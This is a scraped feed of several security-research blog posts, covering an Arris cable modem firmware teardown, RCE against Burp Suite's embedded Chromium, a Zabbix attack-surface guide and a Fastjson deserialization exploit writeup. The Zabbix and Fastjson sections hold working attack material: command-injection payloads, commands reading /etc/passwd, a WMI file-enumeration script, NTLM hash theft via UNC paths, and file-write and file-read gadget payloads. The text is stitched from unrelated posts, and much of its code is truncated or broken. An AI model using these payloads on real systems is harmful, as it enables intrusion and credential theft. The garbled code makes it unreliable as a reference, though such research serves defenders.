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Before yesterdayVulnerabily Research


8 September 2021 at 13:03

Picked up one of these a little while back at the behest of a good friend.

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.


There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.


Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat


Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd


Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on “brcmnand.1”:
0x000000000000–0x000000620000 : “flash1.kernel0”
0x000000620000–0x000000c40000 : “flash1.kernel1”
0x000000c40000–0x000001fa0000 : “flash1.cm0”
0x000001fa0000–0x000003300000 : “flash1.cm1”
0x000003300000–0x000005980000 : “flash1.rg0”
0x000005980000–0x000008000000 : “flash1.rg1”
0x000000000000–0x000008000000 : “flash1”
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on “spi32766.0”:
0x000000000000–0x000000100000 : “flash0.bolt”
0x000000100000–0x000000120000 : “flash0.macadr”
0x000000120000–0x000000140000 : “flash0.nvram”
0x000000140000–0x000000160000 : “flash0.nvram1”
0x000000160000–0x000000180000 : “flash0.devtree0”
0x000000180000–0x0000001a0000 : “flash0.devtree1”
0x0000001a0000–0x000000200000 : “flash0.cmnonvol0”
0x000000200000–0x000000260000 : “flash0.cmnonvol1”
0x000000260000–0x000000330000 : “flash0.rgnonvol0”
0x000000330000–0x000000400000 : “flash0.rgnonvol1”
0x000000000000–0x000000400000 : “flash0”

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=0x2680000 skip=0x5980000

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

This hints that we are likely looking at an adjacent layout. The following python script will handle stripping the spare data out of our dump.

import sys
data_area = 512
spare = 16
combined = data_area + spare
with open(‘rg1’, ‘rb’) as f:
dump =
count = int(len(dump) / combined)
out = b’’
for i in range(count):
out = out + dump[i*block : i*combined + data_area]
with open(‘rg1_stripped’, ‘wb’) as f:

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
dump =
with open('rg1_little', 'wb') as f:
# Page size is 2048
block = 2048
nblocks = int(len(dump) / block)

# Iterate over blocks, byte swap each 32-bit value
for i in range(0, nblocks):
current_block = dump[i*block:(i+1)*block]
j = 0
while j < len(current_block):
section = current_block[j:j+4]
j = j + 4


Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs


Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!

ARRIS CABLE MODEM TEARDOWN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

反制爬虫之 Burp Suite 远程命令执行

By: Wfox
6 September 2021 at 05:14


Headless Chrome是谷歌Chrome浏览器的无界面模式,通过命令行方式打开网页并渲染,常用于自动化测试、网站爬虫、网站截图、XSS检测等场景。


本文以知名渗透软件Burp Suite举例,从软件分析、漏洞挖掘、攻击面扩展等方面进行深入探讨。


以Burp Suite Pro v2.0beta版本为例,要做漏洞挖掘首先要了解软件架构及功能点。

burpsuite_pro_v2.0.11beta.jar进行解包,可以发现Burp Suite打包了Windows、Linux、Mac的Chromium,可以兼容在不同系统下运行内置Chromium浏览器。


在Windows系统中,Burp Suite v2.0运行时会将chromium-win64.7z解压至C:\Users\user\AppData\Local\JxBrowser\browsercore-64.0.3282.24.unknown\目录

从目录名及数字签名得知Burp Suite v2.0是直接引用JxBrowser浏览器控件,其打包的Chromium版本为64.0.3282.24。

那如何在Burp Suite中使用内置浏览器呢?在常见的使用场景中,Proxy -> HTTP history -> Response -> RenderRepeater -> Render都能够调用内置Chromium浏览器渲染网页。

当Burp Suite唤起内置浏览器browsercore32.exe打开网页时,browsercore32.exe会创建Renderer进程及GPU加速进程。


// Chromium主进程
C:\Users\user\AppData\Local\JxBrowser\browsercore-64.0.3282.24.unknown\browsercore32.exe --port=53070 --pid=13208 --dpi-awareness=system-aware --crash-dump-dir=C:\Users\user\AppData\Local\JxBrowser --lang=zh-CN --no-sandbox --disable-xss-auditor --headless --disable-gpu --log-level=2 --proxy-server="socks://" --disable-bundled-ppapi-flash --disable-plugins-discovery --disable-default-apps --disable-extensions --disable-prerender-local-predictor --disable-save-password-bubble --disable-sync --disk-cache-size=0 --incognito --media-cache-size=0 --no-events --disable-settings-window

// Renderer进程
C:\Users\user\AppData\Local\JxBrowser\browsercore-64.0.3282.24.unknown\browsercore32.exe --type=renderer --log-level=2 --no-sandbox --disable-features=LoadingWithMojo,browser-side-navigation --disable-databases --disable-gpu-compositing --service-pipe-token=C06434E20AA8C9230D15FCDFE9C96993 --lang=zh-CN --crash-dump-dir="C:\Users\user\AppData\Local\JxBrowser" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --disable-accelerated-video-decode --service-request-channel-token=C06434E20AA8C9230D15FCDFE9C96993 --renderer-client-id=2 --mojo-platform-channel-handle=2564 /prefetch:1




Burp Suite v2.0内置的Chromium版本为64.0.3282.24,该低版本Chromium受到多个历史漏洞影响,可以通过v8引擎漏洞执行shellcode从而获得PC权限。


这个漏洞没有公开的CVE ID,但其详情可以在这里找到。
该漏洞的Root Cause是在进行Math.expm1的范围分析时,推断出的类型是Union(PlainNumber, NaN),忽略了Math.expm1(-0)会返回-0的情况,从而导致范围分析错误,导致JIT优化时,错误的将边界检查CheckBounds移除,造成了OOB漏洞。




Burp Suite v2.0的Live audit from Proxy被动扫描功能在默认情况下开启JavaScript分析引擎(JavaScript analysis),用于扫描JavaScript漏洞。

其中JavaScript分析配置中,默认开启了动态分析功能(dynamic analysis techniques)、额外请求功能(Make requests for missing Javascript dependencies)

JavaScript动态分析功能会调用内置chromium浏览器对页面中的JavaScript进行DOM XSS扫描,同样会触发页面中的HTML渲染、JavaScript执行,从而触发v8漏洞执行shellcode。


额外发起的HTTP请求会存在明文特征,后端可以根据该特征在正常加载时返回正常JavaScript代码,额外加载时返回漏洞利用代码,从而可以实现在Burp Suite HTTP history中隐藏攻击行为。

GET /xxx.js HTTP/1.1
Connection: close
Cookie: JSESSIONID=3B6FD6BC99B03A63966FC9CF4E8483FF

JavaScript动态分析 + 额外请求 + chromium漏洞组合利用效果:

Kapture 2021-09-06 at 2.14.35


默认情况下Java发起HTTPS请求时协商的算法会受到JDK及操作系统版本影响,而Burp Suite自己实现了HTTPS请求库,其TLS握手协商的算法是固定的,结合JA3算法形成了TLS流量指纹特征可被检测,有关于JA3检测的知识点可学习《TLS Fingerprinting with JA3 and JA3S》。

Cloudflare开源并在CDN产品上应用了MITMEngine组件,通过TLS指纹识别可检测出恶意请求并拦截,其覆盖了大多数Burp Suite版本的JA3指纹从而实现检测拦截。这也可以解释为什么在渗透测试时使用Burp Suite请求无法获取到响应包。

以Burp Suite v2.0举例,实际测试在各个操作系统下,同样的jar包发起的JA3指纹是一样的。


不同版本Burp Suite支持的TLS算法不一样会导致JA3指纹不同,但同样的Burp Suite版本JA3指纹肯定是一样的。如果需要覆盖Burp Suite流量检测只需要将每个版本的JA3指纹识别覆盖即可检测Burp Suite攻击从而实现拦截。


Zabbix 攻击面挖掘与利用

By: Wfox
17 August 2021 at 06:47


Zabbix是一个支持实时监控数千台服务器、虚拟机和网络设备的企业级解决方案,客户覆盖许多大型企业。本议题介绍了Zabbix基础架构、Zabbix Server攻击面以及权限后利用,如何在复杂内网环境中从Agent控制Server权限、再基于Server拿下所有内网Agent。



1. Zabbix Server

Zabbix Server是所有配置、统计和操作数据的中央存储中心,也是Zabbix监控系统的告警中心。在监控的系统中出现任何异常,将被发出通知给管理员。

Zabbix Server的功能可分解成为三个不同的组件,分别为Zabbix Server服务、Web后台及数据库。

2. Zabbix Proxy

Zabbix Proxy是在大规模分布式监控场景中采用一种分担Zabbix Server压力的分层结构,其多用在跨机房、跨网络的环境中,Zabbix Proxy可以代替Zabbix Server收集性能和可用性数据,然后把数据汇报给Zabbix Server,并且在一定程度上分担了Zabbix Server的压力。

3. Zabbix Agent

Zabbix Agent部署在被监控的目标机器上,以主动监控本地资源和应用程序(硬盘、内存、处理器统计信息等)。

Zabbix Agent收集本地的状态信息并将数据上报给Zabbix Server用于进一步处理。


对于Zabbix Agent客户端来说,根据请求类型可分为被动模式及主动模式:

  • 被动模式:Server向Agent的10050端口获取监控项数据,Agent根据监控项收集本机数据并响应。
  • 主动模式:Agent主动请求Server(Proxy)的10051端口获取监控项列表,并根据监控项收集本机数据提交给Server(Proxy)


  • Server-Client架构


  • Server-Proxy-Client架构


四、Zabbix Agent配置分析


Zabbix Agent服务的配置文件为zabbix_agentd.conf,Linux默认路径在/etc/zabbix/zabbix_agentd.conf,可通过以下命令查看agent配置文件并过滤掉注释内容:

cat /etc/zabbix/zabbix_agentd.conf | grep -v '^#' | grep -v '^$'


  • Server参数


  • ServerActive参数


  • StartAgents参数



经过对 zabbix_agentd.conf 配置文件各个参数的安全性研究,总结出以下配置不当可能导致安全风险的配置项:

  • EnableRemoteCommands参数

是否允许来自Zabbix Server的远程命令,开启后可通过Server下发shell脚本在Agent上执行。


  • AllowRoot参数



  • UserParameter参数


UserParameter=ping[*],echo $1

当Server向Agent执行ping[aaaa]指令时,$1为传参的值,Agent经过拼接之后执行的命令为echo aaaa,最终执行结果为aaaa



  • UnsafeUserParameters参数

自定义用户参数是否允许传参任意字符,默认不允许字符\ ' " ` * ? [ ] { } ~ $ ! & ; ( ) < > | # @




UserParameter=ping[*],echo $1 为例,向Agent执行指令ping[test && whoami],经过命令拼接后最终执行echo test && whoami,成功注入执行shell命令。

  • Include参数



五、Zabbix Server攻击手法

除了有利用条件的Zabbix Agent漏洞外,默认情况下Agent受限于IP白名单限制,只处理来自Server的请求,所以攻击Zabbix Agent的首要途径就是先拿下Zabbix Server。

经过对Zabbix Server攻击面进行梳理,总结出部分攻击效果较好的漏洞:

1. Zabbix Web后台弱口令



2. MySQL弱口令

从用户习惯来看,运维在配置Zabbix时喜欢用弱口令作为MySQL密码,且搜索引擎的Zabbix配置教程基本用的都是弱口令,这导致实际环境中Zabbix Server的数据库密码通常为弱口令。

除了默认root用户无法外连之外,运维通常会新建MySQL用户 zabbix,根据用户习惯梳理了zabbix用户的常见密码:


拿下MySQL数据库后,可解密users表的密码md5值,或者直接替换密码的md5为已知密码,即可登录Zabbix Web。

3. CVE-2020-11800 命令注入

Zabbix Server的trapper功能中active checks命令存在CVE-2020-11800命令注入漏洞,该漏洞为基于CVE-2017-2824的绕过利用。
未授权攻击者向Zabbix Server的10051端口发送trapper功能相关命令,利用漏洞即可在Zabbix Server上执行系统命令。

active checks是Agent主动检查时用于获取监控项列表的命令,Zabbix Server在开启自动注册的情况下,通过active checks命令请求获取一个不存在的host时,自动注册机制会将json请求中的host、ip添加到interface数据表里,其中CVE-2020-11800漏洞通过ipv6格式绕过ip字段检测注入执行shell命令,受数据表字段限制Payload长度只能为64个字符

{"request":"active checks","host":"vulhub","ip":"ffff:::;whoami"}


active checks -> send_list_of_active_checks_json() -> get_hostid_by_host() -> DBregister_host()


# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1



由于默认脚本的类型限制,脚本都是在Zabbix Server上运行,Zabbix Proxy是无法使用command指令的。payload长度受限制可拆分多次执行,必须更换host名称以执行新的payload。

漏洞靶场及利用脚本:Zabbix Server trapper命令注入漏洞(CVE-2020-11800)


4. CVE-2017-2824 命令注入


漏洞靶场及利用脚本:Zabbix Server trapper命令注入漏洞(CVE-2017-2824)

5. CVE-2016-10134 SQL注入

CVE-2016-10134 SQL注入漏洞已知有两个注入点:

  • latest.php,需登录,可使用未关闭的Guest访客账号。


  • jsrpc.php,无需登录即可利用。


漏洞靶场及利用脚本:zabbix latest.php SQL注入漏洞(CVE-2016-10134)

六、Zabbix Server权限后利用

拿下Zabbix Server权限只是阶段性的成功,接下来的问题是如何控制Zabbix Agent以达到最终攻击目的。

Zabbix Agent的10050端口仅处理来自Zabbix Server或Proxy的请求,所以后续攻击都是依赖于Zabbix Server权限进行扩展,本章节主要讲解基于监控项item功能的后利用。


以Zabbix 4.0版本为例,按照个人理解 item监控项可分为通用监控项、主动检查监控项、Windows监控项、自定义用户参数(UserParameter)监控项,Agent监控项较多不一一例举,可参考以下链接:
1. Zabbix Agent监控项
2. Zabbix Agent Windows监控项

在控制Zabbix Server权限的情况下可通过zabbix_get命令向Agent获取监控项数据,比如说获取Agent的系统内核信息:

zabbix_get -s -p 10050 -k "system.uname"



1. EnableRemoteCommands参数远程命令执行

Zabbix最为经典的命令执行利用姿势,许多人以为控制了Zabbix Server就肯定能在Agent上执行命令,其实不然,Agent远程执行系统命令需要在zabbix_agentd.conf配置文件中开启EnableRemoteCommands参数。

在Zabbix Web上添加脚本,“执行在”选项可根据需求选择,“执行在Zabbix服务器” 不需要开启EnableRemoteCommands参数,所以一般控制Zabbix Web后可通过该方式在Zabbix Server上执行命令拿到服务器权限。

如果要指定某个主机执行该脚本,可从Zabbix Web的“监测中 -> 最新数据”功能中根据过滤条件找到想要执行脚本的主机,单击主机名即可在对应Agent上执行脚本。

这里有个常见误区,如果类型是“执行在Zabbix服务器”,无论选择哪台主机执行脚本,最终都是执行在Zabbix Server上。



如果不想在Zabbix Web上留下太多日志痕迹,或者想批量控制Agent,拿下Zabbix Server权限后可以通过zabbix_get命令向Agent执行监控项命令,在Zabbix Web执行脚本实际上等于执行system.run监控项命令

也可以基于Zabbix Server作为隧道跳板,在本地执行zabbix_get命令也能达到同样效果(Zabbix Agent为IP白名单校验)。


2. UserParameter自定义参数命令注入


当Zabbiax Agent的zabbix_agentd.conf配置文件开启UnsafeUserParameters参数的情况下,传参值字符不受限制,只需要找到存在传参的自定义参数UserParameter,就能达到命令注入的效果。


UserParameter=ping[*],echo $1


zabbix_agentd.conf 文件中添加 UnsafeUserParameters=1,command经过传参拼接后成功注入系统命令。

zabbix_get -s -p 10050 -k "ping[test && id]"



3. 任意文件读取

Zabbix Agent如果没有配置不当的问题,是否有其他姿势可以利用呢?答案是肯定的。


zabbix_get -s -p 10050 -k "vfs.file.contents[/etc/passwd]"




4. Windows目录遍历


  • 遍历盘符



zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM Win32_LogicalDisk\"]"


zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM Win32_LogicalDisk WHERE Name!='C:'\"]"

可通过脚本一直追加条件语句进行查询,直至出现Cannot obtain WMI information.代表WQL已经无法查询出结果。从图中可以看到通过wmi.get命令查询出了该机器上存在C:、D:盘符。


  • 遍历目录


zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Caption FROM Win32_Directory WHERE Drive='C:' AND Path='\\\\' \"]"

zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Caption FROM Win32_Directory WHERE Drive='C:' AND Path='\\\\' AND Caption != 'C:\\\\\$Recycle.Bin' \"]"

zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Caption FROM Win32_Directory WHERE Drive='C:' AND Path='\\\\' AND Caption != 'C:\\\\\$Recycle.Bin' AND Caption != 'C:\\\\\$WinREAgent' \"]"




zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM CIM_DataFile WHERE Drive='C:' AND Path='\\\\' \"]"

zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM CIM_DataFile WHERE Drive='C:' AND Path='\\\\' AND Name != 'C:\\\\\$WINRE_BACKUP_PARTITION.MARKER' \"]"

zabbix_get -s -p 10050 -k "wmi.get[root\\cimv2,\"SELECT Name FROM CIM_DataFile WHERE Drive='C:' AND Path='\\\\' AND Name != 'C:\\\\\$WINRE_BACKUP_PARTITION.MARKER' AND Name !='C:\\\\browser.exe' \"]"





import os
import sys

count = 0

def zabbix_exec(ip, command):
    global count
    count = count + 1
    check = os.popen("./zabbix_get -s " + ip + " -k \"" + command + "\"").read()
    if "Cannot obtain WMI information" not in check:
        return check.strip()
        return False

def getpath(path):
    return path.replace("\\","\\\\\\\\").replace("$","\\$")

def GetDisk(ip):
    where = ""
        check_disk = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Name FROM Win32_LogicalDisk WHERE Name != '' " + where + "\\\"]")
        if check_disk:
            where = where + "AND Name != '" + check_disk+ "'"

def GetDirs(ip, dir):
    drive = dir[0:2]
    path = dir[2:]

    where = ""
        check_dir = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Caption FROM Win32_Directory WHERE Drive='" + drive + "' AND Path='" + getpath(path) + "' " + where + "\\\"]")
        if check_dir:
            where = where + "AND Caption != '" + getpath(check_dir) + "'"

def GetFiles(ip, dir):
    drive = dir[0:2]
    path = dir[2:]

    where = ""
        check_file = zabbix_exec(ip, "wmi.get[root\cimv2,\\\"SELECT Name FROM CIM_DataFile WHERE Drive='" + drive + "' AND Path='" + getpath(path) + "' " + where + "\\\"]")
        if check_file:
            if "Invalid item key format" in check_file:
            where = where + "AND Name != '" + getpath(check_file) + "'"

def Readfile(ip, file):
    read = zabbix_exec(ip, "vfs.file.contents[" + file + "]")

if __name__ == "__main__":
    if len(sys.argv) == 2:
    elif sys.argv[2][-1] != "\\":
        Readfile(sys.argv[1], sys.argv[2])
    print("Request count: " + str(count))

5. Windows UNC路径利用

在Windows Zabbix Agent环境中,可以利用vfs.file.contents命令读取UNC路径,窃取Zabbix Agent机器的Net-NTLM hash,从而进一步Net-NTLM relay攻击。

Window Zabbix Agent默认安装成Windows服务,运行在SYSTEM权限下。在工作组环境中,system用户的Net-NTLM hash为空,所以工作组环境无法利用。

在域内环境中,SYSTEM用户即机器用户,如果是Net-NTLM v1的情况下,可以利用Responder工具获取Net-NTLM v1 hash并通过算法缺陷解密拿到NTLM hash,配合资源约束委派获取域内机器用户权限,从而拿下Agent机器权限。


zabbix_get -s -p 10050 -k "vfs.file.contents[\\\\\\cc]"



6. Zabbix Proxy和主动检查模式利用场景


如果在Zabbix Proxy场景或Agent主动检查模式的情况下,Zabbix Server无法直接与Agent 10050端口通讯,可以使用比较通用的办法,就是通过Zabbix Web添加监控项。






ps: 添加的监控项会一直定时执行,所以执行完后记得删除监控项。


Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用

By: Skay
17 August 2021 at 05:11







二、byPass checkAutotype



一句话总结checkAutoType(String typeName, Class<?> expectClass, int features) 方法的 typeName 实现或继承自 expectClass,就会通过检验


三、议题中使用的Fastjson 的一些已公开Gadgets

  • 必须继承 auto closeable。
  • 必须具有默认构造函数或带符号的构造函数,否则无法正确实例化。
  • 不在黑名单中
  • 可以引起 rce 、任意文件读写或其他高风险影响
  • gadget的依赖应该在原生jdk或者广泛使用的第三方库中





1.Mysql JDBC



public class Payload_test {
    public static void main(String[] args){

        String payload_mysqljdbc = "{\"aaa\":{\"@type\":\"\\u006a\\u0061\\u0076\\u0061.lang.AutoCloseable\", \"@type\":\"\\u0063\\u006f\\u006d.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"\",\"portToConnectTo\":3306,\"url\":\"jdbc:mysql://\",\"databaseToConnectTo\":\"test\",\"info\":{\"@type\":\"\\u006a\\u0061\\u0076\\u0061.util.Properties\",\"PORT\":\"3306\",\"statementInterceptors\":\"\\u0063\\u006f\\u006d.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\",\"user\":\"cb\",\"PORT.1\":\"3306\",\"HOST.1\":\"\",\"NUM_HOSTS\":\"1\",\"HOST\":\"\",\"DBNAME\":\"test\"}}\n" + "}";





2.1 commons-io 2.0 - 2.6

 String aaa_8192 = "ssssssssssssss"+Some_Functions.getRandomString(8192);
//        String write_name = "C://Windows//Temp//sss.txt";
String write_name = "D://tmp//sss.txt";
String payload_commons_io_filewrite_0_6 = "{\"x\":{\"@type\":\"\",\"input\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"reader\":{\"@type\":\"\",\"charSequence\":{\"@type\":\"java.lang.String\"\""+aaa_8192+"\"},\"charsetName\":\"UTF-8\",\"bufferSize\":1024},\"branch\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"writer\":{\"@type\":\"\",\"file\":\""+write_name+"\",\"encoding\":\"UTF-8\",\"append\": false},\"charsetName\":\"UTF-8\",\"bufferSize\": 1024,\"writeImmediately\": true},\"trigger\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"is\":{\"@type\":\"\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger2\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"is\":{\"@type\":\"\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger3\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"is\":{\"@type\":\"\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"}}}";



2.1 commons-io 2.7.0 - 2.8.0

String payload_commons_io_filewrite_7_8 = "{\"x\":{\"@type\":\"\",\"input\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"reader\":{\"@type\":\"\",\"charSequence\":{\"@type\":\"java.lang.String\"\""+aaa_8192+"\",\"start\":0,\"end\":2147483647},\"charsetName\":\"UTF-8\",\"bufferSize\":1024},\"branch\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"writer\":{\"@type\":\"\",\"file\":\""+write_name+"\",\"charsetName\":\"UTF-8\",\"append\": false},\"charsetName\":\"UTF-8\",\"bufferSize\": 1024,\"writeImmediately\": true},\"trigger\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"inputStream\":{\"@type\":\"\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger2\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"inputStream\":{\"@type\":\"\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger3\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"\",\"inputStream\":{\"@type\":\"\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"}}";

3.commons-io 逐字节读文件内容

String payload_read_file = "{\"abc\": {\"@type\": \"java.lang.AutoCloseable\",\"@type\": \"\",\"delegate\": {\"@type\": \"\",\"reader\": {\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\"url\": \"file:///D:/tmp/sss.txt\"},\"charsetName\": \"UTF-8\",\"bufferSize\": 1024},\"boms\": [{\"charsetName\": \"UTF-8\",\"bytes\": [11]}]},\"address\": {\"$ref\": \"$.abc.BOM\"}}";

四、New Gadgets 及实现区块链RCE

PPT中提到了,它没有mysql-jdbc链,且为Spring-boot,无法直接写webshell。虽然我们可以覆盖class文件,但是需要root权限,且并不确定charse.jar path。

然后回到目标本身,java tron是tron推出的公链协议的java实现,是一个开源 Java 应用程序,Java-tron 可以在 tron 节点上启用 HTTP 服务内部使用Fastjson解析Json数据。且:

• Leveldb 和 leveldbjni:

• 快速键值存储库

• 被比特币使用,因此被很多公链继承

• 存储区块链元数据,频繁轮询读写

• 需要效率,所以 JNI


1.模拟环境 Levaldbjni_Sample


两次执行 File("/tmp/lvltest1"), options);都将会加载

 * @auther Skay
 * @date 2021/8/10 19:35
 * @description

import static org.fusesource.leveldbjni.JniDBFactory.factory;


import org.iq80.leveldb.DB;
import org.iq80.leveldb.Options;

public class Levaldbjni_Sample {
    public static void main(String[] args) throws IOException, InterruptedException {
        Options options = new Options();
        DB db = File("/tmp/lvltest"), options);
        System.out.println("so file created");
        System.out.println("watting attack.......");
        DB db1 = File("/tmp/lvltest1"), options);

        try {
            for (int i = 0; i < 1000000; i++) {
                byte[] key = new String("key" + i).getBytes();
                byte[] value = new String("value" + i).getBytes();
                db.put(key, value);
            for (int i = 0; i < 1000000; i++) {
                byte[] key = new String("key" + i).getBytes();
                byte[] value = db.get(key);
                String targetValue = "value" + i;
                if (!new String(value).equals(targetValue)) {
                    System.out.println("something wrong!");
            for (int i = 0; i < 1000000; i++) {
                byte[] key = new String("key" + i).getBytes();

//            Thread.sleep(500000);
        } catch (Exception e) {
        } finally {




2.commons-io 逐字节读文件名


public static char fakeChar(char[] fileName){
    char[] fs=new char[fileName.length+1];
    for (char i = 1; i <= 127; i++) {
        String payload_read_file = "{\"abc\": {\"@type\": \"java.lang.AutoCloseable\",\"@type\": \"\",\"delegate\": {\"@type\": \"\",\"reader\": {\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\"url\": \"netdoc:///tmp/\"},\"charsetName\": \"utf-8\",\"bufferSize\": 1024},\"boms\": [{\"charsetName\": \"utf-8\",\"bytes\": ["+formatChars(fs)+"]}]},\"address\": {\"$ref\": \"$.abc.BOM\"}}";
        if (JSON.parse(payload_read_file).toString().indexOf("bOMCharsetName")>0){
            return i;
    return 0;














 * @auther Skay
 * @date 2021/8/13 14:25
 * @description
public class payload_AspectJ_writefile {
    public static void write_so(String target_path){
        byte[] bom_buffer_bytes = readFileInBytesToString("./");
//        String so_content = new String(bom_buffer_bytes);
//        for (int i=0;i<8192;i++){
//            so_content = so_content+"a";
//        }
//        String base64_so_content = Base64.getEncoder().encodeToString(so_content.getBytes());
        String base64_so_content = Base64.getEncoder().encodeToString(bom_buffer_bytes);
        byte[] big_bom_buffer_bytes = Base64.getDecoder().decode(base64_so_content);
//        byte[] big_bom_buffer_bytes = base64_so_content.getBytes();
